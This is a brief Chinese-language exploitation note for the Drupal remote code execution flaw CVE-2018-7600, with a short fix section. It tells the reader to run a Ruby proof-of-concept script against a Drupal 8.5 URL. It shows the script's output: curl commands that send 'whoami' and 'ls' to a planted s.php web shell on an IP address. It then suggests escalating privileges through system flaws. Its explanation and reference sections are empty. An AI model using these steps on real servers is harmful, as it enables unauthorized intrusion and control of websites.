1.系统环境
- Drupal 8.5
- linux 主机
- ruby 代码
2.原理说明
影响版本
Drupal 6.x,7.x,8.x
参考:
3.利用
在Python2.7 环境下运行poc即可验证
或者在Linux下安装ruby环境 并且运行 CVE-2018-7600.rb文件
ruby CVE-2017-7600.rb ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/[*] Fake shell: curl 'http://47.98.122.11:8089/drupal-8.5.0/s.php' -d 'c=whoami' [*] Fake shell: curl 'http://47.98.122.11:8089/drupal-8.5.0/s.php' -d 'c=ls'
最后可以查找系统漏洞进行提权
4.修复
主要支持版本推荐更新到Drupal相应的最新子版本
参考